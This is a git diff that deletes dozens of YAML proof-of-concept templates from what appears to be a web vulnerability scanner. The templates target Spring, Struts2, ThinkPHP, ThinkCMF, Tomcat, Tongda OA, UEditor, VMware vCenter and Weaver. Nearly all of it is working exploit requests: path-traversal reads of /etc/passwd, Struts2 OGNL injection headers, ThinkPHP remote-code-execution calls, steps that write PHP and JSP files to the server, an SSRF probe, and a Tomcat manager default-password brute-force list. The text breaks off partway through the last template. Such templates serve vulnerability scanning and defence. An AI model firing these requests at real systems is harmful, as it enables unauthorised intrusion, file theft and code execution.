a/WebScan/pocs/spring-actuator-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-actuator-heapdump-file -rules: - - method: HEAD - path: /actuator/heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-actuator-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/spring-cloud-cve-2020-5405.yml b/WebScan/pocs/spring-cloud-cve-2020-5405.yml deleted file mode 100644 index f11a403..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5405.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5405 -rules: - - method: GET - path: >- - /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) - -detail: - version: <= 2.1.6, 2.2.1 - author: kingkk(https://www.kingkk.com/) - links: - - https://pivotal.io/security/cve-2020-5405 - - https://github.com/spring-cloud/spring-cloud-config \ No newline at end of file diff --git a/WebScan/pocs/spring-cloud-cve-2020-5410.yml b/WebScan/pocs/spring-cloud-cve-2020-5410.yml deleted file mode 100644 index 026b337..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5410.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5410 -rules: - - method: GET - path: >- - /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" - links: - - https://xz.aliyun.com/t/7877 \ No newline at end of file diff --git a/WebScan/pocs/spring-cve-2016-4977.yml b/WebScan/pocs/spring-cve-2016-4977.yml deleted file mode 100644 index 5df7d07..0000000 --- a/WebScan/pocs/spring-cve-2016-4977.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cve-2016-4977 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml deleted file mode 100644 index 148930d..0000000 --- a/WebScan/pocs/spring-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-heapdump-file -rules: - - method: HEAD - path: /heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml deleted file mode 100644 index 5ddda4f..0000000 --- a/WebScan/pocs/springboot-env-unauth.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml deleted file mode 100644 index 6a78661..0000000 --- a/WebScan/pocs/springboot-env-unauth2.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /actuator/env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springcloud-cve-2019-3799.yml b/WebScan/pocs/springcloud-cve-2019-3799.yml deleted file mode 100644 index 821028f..0000000 --- a/WebScan/pocs/springcloud-cve-2019-3799.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-springcloud-cve-2019-3799 -rules: - - method: GET - path: >- - /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd - follow_redirects: true - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) - -detail: - version: <2.1.2, 2.0.4, 1.4.6 - author: Loneyer - links: - - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml deleted file mode 100644 index d2dc423..0000000 --- a/WebScan/pocs/struts2-045-1.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-struts2_045-1 -set: - r1: randomInt(800, 1000) - r2: randomInt(800, 1000) -rules: - - method: GET - path: / - headers: - Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data - follow_redirects: true - expression: | - "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2)) -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml deleted file mode 100644 index 18769e6..0000000 --- a/WebScan/pocs/struts2-045-2.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-struts2_045-2 -rules: - - method: GET - path: / - headers: - Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}" - follow_redirects: true - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml deleted file mode 100644 index f0ec629..0000000 --- a/WebScan/pocs/struts2-046-1.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-struts2_046-1 -set: - r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------" -rules: - - method: POST - path: / - headers: - Content-Type: multipart/form-data; boundary=--------------------------- - follow_redirects: true - body: | - {{r1}} - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml deleted file mode 100644 index 5971c53..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No1.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth1 -rules: - - method: GET - path: /swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml deleted file mode 100644 index a3f663e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No2.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth2 -rules: - - method: GET - path: /api/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml deleted file mode 100644 index 66e81f1..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No3.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth3 -rules: - - method: GET - path: /service/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml deleted file mode 100644 index e109fc9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No4.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth4 -rules: - - method: GET - path: /web/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml deleted file mode 100644 index f111855..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No5.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth5 -rules: - - method: GET - path: /swagger/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml deleted file mode 100644 index 3f18e6e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No6.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth6 -rules: - - method: GET - path: /actuator/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml deleted file mode 100644 index 2e130c9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No7.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth7 -rules: - - method: GET - path: /libs/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml deleted file mode 100644 index 33a63f4..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No8.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui8 -rules: - - method: GET - path: /template/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/thinkadmin-v6-readfile.yml b/WebScan/pocs/thinkadmin-v6-readfile.yml deleted file mode 100644 index 37755bf..0000000 --- a/WebScan/pocs/thinkadmin-v6-readfile.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkadmin-v6-readfile -rules: - - method: GET - path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) -detail: - author: 0x_zmz(github.com/0x-zmz) - info: thinkadmin-v6-readfile By 0x_zmz - links: - - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw - - https://github.com/0x-zmz diff --git a/WebScan/pocs/thinkcmf-lfi.yml b/WebScan/pocs/thinkcmf-lfi.yml deleted file mode 100644 index 3b56650..0000000 --- a/WebScan/pocs/thinkcmf-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkcmf-lfi - -rules: - - method: GET - path: "/?a=display&templateFile=README.md" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) - -detail: - author: JerryKing - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkcmf-write-shell.yml b/WebScan/pocs/thinkcmf-write-shell.yml deleted file mode 100644 index 5527f44..0000000 --- a/WebScan/pocs/thinkcmf-write-shell.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-thinkcmf-write-shell -set: - r: randomInt(10000, 20000) - r1: randomInt(1000000000, 2000000000) -rules: - - method: GET - path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" - expression: "true" - - method: GET - path: "/{{r}}.php" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1))) - -detail: - author: violin - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkphp-v6-file-write.yml b/WebScan/pocs/thinkphp-v6-file-write.yml deleted file mode 100644 index 8346f40..0000000 --- a/WebScan/pocs/thinkphp-v6-file-write.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-thinkphp-v6-file-write -set: - f1: randomInt(800000000, 900000000) -rules: - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 404 - - method: GET - path: / - headers: - Cookie: PHPSESSID=../../../../public/{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("text/html") -detail: - author: Loneyer - Affected Version: "Thinkphp 6.0.0" - links: - - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write diff --git a/WebScan/pocs/thinkphp5-controller-rce.yml b/WebScan/pocs/thinkphp5-controller-rce.yml deleted file mode 100644 index c0ddd62..0000000 --- a/WebScan/pocs/thinkphp5-controller-rce.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-thinkphp5-controller-rce -rules: - - method: GET - path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 - expression: | - response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") - -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce \ No newline at end of file diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml deleted file mode 100644 index d24987b..0000000 --- a/WebScan/pocs/thinkphp5023-method-rce.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkphp5023-method-rce -rules: - - method: POST - path: /index.php?s=captcha - headers: - Content-Type: application/x-www-form-urlencoded - body: | - _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 - expression: | - response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce \ No newline at end of file diff --git a/WebScan/pocs/tianqing-info-leak.yml b/WebScan/pocs/tianqing-info-leak.yml deleted file mode 100644 index 6bf6789..0000000 --- a/WebScan/pocs/tianqing-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-tianqing-info-leak -rules: - - method: GET - path: /api/dbstat/gettablessize - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml b/WebScan/pocs/tomcat-cve-2017-12615-rce.yml deleted file mode 100644 index dc1fdf7..0000000 --- a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-tomcat-cve-2017-12615-rce -set: - filename: randomLowercase(6) - verifyStr: randomLowercase(12) - commentStr: randomLowercase(12) -rules: - - method: PUT - path: '/{{filename}}.jsp/' - body: '{{verifyStr}} <%-- {{commentStr}} --%>' - follow_redirects: false - expression: | - response.status == 201 - - method: GET - path: '/{{filename}}.jsp' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://www.seebug.org/vuldb/ssvid-96562 - - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA diff --git a/WebScan/pocs/tomcat-cve-2018-11759.yml b/WebScan/pocs/tomcat-cve-2018-11759.yml deleted file mode 100644 index 7ab73aa..0000000 --- a/WebScan/pocs/tomcat-cve-2018-11759.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tomcat-cve-2018-11759 -rules: - - method: GET - path: /jkstatus; - follow_redirects: false - expression: | - response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) - - method: GET - path: /jkstatus;?cmd=dump - follow_redirects: false - expression: | - response.status == 200 && "ServerRoot=*".bmatches(response.body) -detail: - author: loneyer - links: - - https://github.com/immunIT/CVE-2018-11759 diff --git a/WebScan/pocs/tomcat-manager-weak.yml b/WebScan/pocs/tomcat-manager-weak.yml deleted file mode 100644 index b167851..0000000 --- a/WebScan/pocs/tomcat-manager-weak.yml +++ /dev/null @@ -1,31 +0,0 @@ -name: poc-yaml-tomcat-manager-weak -sets: - username: - - tomcat - - admin - - root - - manager - password: - - "" - - admin - - tomcat - - 123456 - - root - payload: - - base64(username+":"+password) -rules: - - method: GET - path: /manager/html - follow_redirects: false - expression: | - response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") - - method: GET - path: /manager/html - headers: - Authorization: Basic {{payload}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/tongda-meeting-unauthorized-access.yml b/WebScan/pocs/tongda-meeting-unauthorized-access.yml deleted file mode 100644 index b7e4e5c..0000000 --- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tongda-meeting-unauthorized-access -rules: - - method: GET - path: >- - /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay - headers: - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: ' < 通达OA 11.5' - links: - - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml deleted file mode 100644 index 05768d9..0000000 --- a/WebScan/pocs/tongda-user-session-disclosure.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tongda-user-session-disclosure -rules: - - method: GET - path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 - follow_redirects: false - expression: "true" - - - method: POST - path: /general/userinfo.php?UID=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ \ No newline at end of file diff --git a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml b/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml deleted file mode 100644 index 19b9ba6..0000000 --- a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ueditor-cnvd-2017-20077-file-upload -rules: - - method: GET - path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 - headers: - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: 'UEditor v1.4.3.3' - links: - - https://zhuanlan.zhihu.com/p/85265552 - - https://www.freebuf.com/vuls/181814.html - exploit: >- - http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 diff --git a/WebScan/pocs/vengd-upload-rce.yml b/WebScan/pocs/vengd-upload-rce.yml deleted file mode 100644 index deaec2f..0000000 --- a/WebScan/pocs/vengd-upload-rce.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-vengd-upload-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(40000, 44800) - r4: randomInt(40000, 44800) -rules: - - method: POST - path: /Upload/upload_file.php?l={{r1}} - headers: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - body: |- - ------WebKitFormBoundaryfcKRltGv - Content-Disposition: form-data; name="file"; filename="{{r2}}.php" - Content-Type: image/avif - - ------WebKitFormBoundaryfcKRltGv-- - expression: response.status == 200 && response.body.bcontains(b"_Request:") - - method: GET - path: '/Upload/{{r1}}/{{r2}}.php' - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml deleted file mode 100644 index a32c5c2..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read -rules: - - method: GET - path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml deleted file mode 100644 index 064aa10..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read2 -rules: - - method: GET - path: /eam/vib?id=/etc/passwd - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml deleted file mode 100644 index 6d3b795..0000000 --- a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-vmware-vcenter-cve-2021-21985-rce -rules: - - method: POST - path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - headers: - Content-Type: application/json - body: |- - {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a - expression: | - response.status == 200 && response.body.bcontains(b"result") -detail: - vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData" - author: envone77 - description: "vmware vCenter unauth RCE cve-2021-21985" - links: - - https://www.anquanke.com/post/id/243098 - - https://github.com/alt3kx/CVE-2021-21985_PoC \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml deleted file mode 100644 index c2ed9a9..0000000 --- a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 -rules: - - method: GET - path: /ui/vropspluginui/rest/services/uploadova - follow_redirects: false - expression: | - response.status == 405 && response.body.bcontains(b"Method Not Allowed") - - method: GET - path: /ui/vropspluginui/rest/services/getstatus - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://swarm.ptsecurity.com/unauth-rce-vmware/ \ No newline at end of file diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml deleted file mode 100644 index 6b27d65..0000000 --- a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf -rules: - - method: POST - path: /casa/nodes/thumbprints - headers: - Content-Type: application/json - body: | - ["127.0.0.1:443/ui/"] - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) -detail: - author: Loneyer - links: - - https://www.vmware.com/security/advisories/VMSA-2021-0004.html \ No newline at end of file diff --git a/WebScan/pocs/weaver-ebridge-file-read-linux.yml b/WebScan/pocs/weaver-ebridge-file-read-linux.yml deleted file mode 100644 index 47d9379..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-linux.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-linux -rules: - - method: GET - path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: "/file/fileNoLogin/{{var}}" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: mvhz81 - info: e-bridge-file-read for Linux - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-ebridge-file-read-windows.yml b/WebScan/pocs/weaver-ebridge-file-read-windows.yml deleted file mode 100644 index cb06435..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-windows.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-windows -rules: - - method: GET - path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: /file/fileNoLogin/{{var}} - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) -detail: - author: mvhz81 - info: e-bridge-file-read for windows - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml b/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml deleted file mode 100644 index f37b591..0000000 --- a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml +++ /dev/null @@ -1,24 +0,0 @@ -name: poc-yaml-weaver-oa-arbitrary-file-upload -set: - r1: randomLowercase(4) - r2: randomInt(40000, 44800) - r3: randomInt(40000, 44800) -rules: - - method: POST - path: /page/exportImport/uploadOperation.jsp - headers: - Content-Type: multipart/form-data; 